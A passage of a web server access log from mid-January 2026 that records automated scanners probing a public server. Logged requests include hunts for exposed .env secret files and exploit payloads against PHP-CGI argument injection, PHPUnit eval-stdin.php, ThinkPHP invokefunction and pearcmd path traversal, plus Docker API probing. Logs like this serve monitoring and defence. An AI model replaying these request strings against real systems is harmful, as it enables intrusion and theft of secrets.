SPH-D700 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[15/Jan/2026:00:07:33 +0000] 404 - GET http 92.249.249.197 "/shop/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.160.0 Safari/530.0" "-" +[15/Jan/2026:00:07:33 +0000] 404 - GET http 92.249.249.197 "/cloud/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "-" +[15/Jan/2026:00:07:33 +0000] 404 - GET http 92.249.249.197 "/portal/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; es-us; LG-P769 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[15/Jan/2026:00:07:33 +0000] 404 - GET http 92.249.249.197 "/host/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" "-" +[15/Jan/2026:00:07:35 +0000] 404 - GET http 92.249.249.197 "/support/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/8.50 (Windows NT 5.1; U; de)" "-" +[15/Jan/2026:00:07:36 +0000] 404 - GET http 92.249.249.197 "/pop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.21 (Windows NT 5.1; U; pl)" "-" +[15/Jan/2026:00:07:36 +0000] 404 - GET http 92.249.249.197 "/store/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/6.05 (Windows XP; U) [de]" "-" +[15/Jan/2026:00:07:36 +0000] 404 - GET http 92.249.249.197 "/cdn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.4 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.4" "-" +[15/Jan/2026:00:07:36 +0000] 404 - GET http 92.249.249.197 "/dashboard/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3; en-us; SAMSUNG-SGH-I727 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[15/Jan/2026:00:07:37 +0000] 404 - GET http 92.249.249.197 "/test/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" "-" +[15/Jan/2026:00:07:37 +0000] 404 - GET http 92.249.249.197 "/smtp/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/15.0 Firefox/15.0a1" "-" +[15/Jan/2026:00:07:37 +0000] 404 - GET http 92.249.249.197 "/ftp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATP)" "-" +[15/Jan/2026:00:07:37 +0000] 404 - GET http 92.249.249.197 "/wiki/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)" "-" +[15/Jan/2026:00:07:37 +0000] 404 - GET http 92.249.249.197 "/help/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 OverDrive Media Console/3.3.1" "-" +[15/Jan/2026:00:07:37 +0000] 404 - GET http 92.249.249.197 "/blog/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1" "-" +[15/Jan/2026:00:10:26 +0000] 400 - GET http 92.249.249.197 "/+CSCOE+/logon.html" [Client 185.156.73.19] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.google.com" +[15/Jan/2026:00:11:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:00:21:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[15/Jan/2026:00:23:50 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" "-" +[15/Jan/2026:00:37:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 130.12.180.18] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[15/Jan/2026:00:38:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:00:56:11 +0000] 400 - GET http 92.249.249.197 "/" [Client 20.14.78.26] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[15/Jan/2026:00:56:11 +0000] 400 - - http localhost "-" [Client 20.14.78.26] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:00:59:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:01:00:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:01:32:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.156.129.135] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[15/Jan/2026:01:34:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:01:46:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 91.224.92.146] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[15/Jan/2026:01:47:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.134.148.59] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[15/Jan/2026:01:48:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:01:49:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.134.148.59] [Length 0] [Gzip -] "-" "-" +[15/Jan/2026:01:50:48 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:01:53:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:02:11:01 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[15/Jan/2026:02:18:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:02:26:49 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[15/Jan/2026:02:35:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 162.216.149.198] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[15/Jan/2026:02:43:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:02:44:01 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 93.123.72.132] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:02:45:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:02:46:01 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.187.35.158] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:02:57:17 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[15/Jan/2026:03:03:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 41.215.16.2] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" "-" +[15/Jan/2026:03:05:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:03:07:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:03:08:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:03:09:32 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:03:21:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:03:30:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:03:31:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:03:37:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:03:40:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.236.228.193] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:03:40:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.236.228.193] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:03:43:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 159.223.217.102] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:03:43:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 159.223.217.102] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" +[15/Jan/2026:03:51:57 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[15/Jan/2026:03:54:50 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:03:54:52 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[15/Jan/2026:03:58:09 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:03:58:35 +0000] 400 - GET http 92.249.249.197 "/" [Client 45.194.92.18] [Length 252] [Gzip -] "-" "-" +[15/Jan/2026:03:58:36 +0000] 400 - GET http 92.249.249.197 "/index.htm" [Client 45.194.92.18] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[15/Jan/2026:03:59:33 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[15/Jan/2026:04:01:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:04:04:03 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:04:09:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[15/Jan/2026:04:21:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:04:28:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[15/Jan/2026:04:30:33 +0000] 400 - GET http 92.249.249.197 "/" [Client 47.251.68.119] [Length 252] [Gzip -] "curl/7.64.1" "-" +[15/Jan/2026:04:32:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:04:35:53 +0000] 404 - GET http 92.249.249.197 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:04:37:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:04:39:31 +0000] 400 - GET http 92.249.249.197 "/" [Client 45.79.181.179] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[15/Jan/2026:04:46:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:05:02:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[15/Jan/2026:05:07:27 +0000] 404 - GET http 92.249.249.197 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:05:13:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:05:16:08 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 38.248.14.48] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:05:16:08 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 38.248.14.48] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:05:16:08 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:08 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 38.248.14.48] [Length 154] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:09 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:09 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:09 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:09 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:10 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:10 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:10 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:10 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:11 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:11 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:11 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:11 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:11 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:12 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:12 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:12 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:12 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:12 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:13 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:13 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:13 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:13 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:13 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:13 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:14 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:14 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:14 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:14 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:14 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:14 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:15 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:15 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:15 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:15 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:15 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:16 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:16 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:16 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:16 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:16 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:17 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:16:17 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 38.248.14.48] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:05:28:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:05:31:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 91.224.92.14] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:05:35:25 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[15/Jan/2026:05:37:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:05:51:10 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 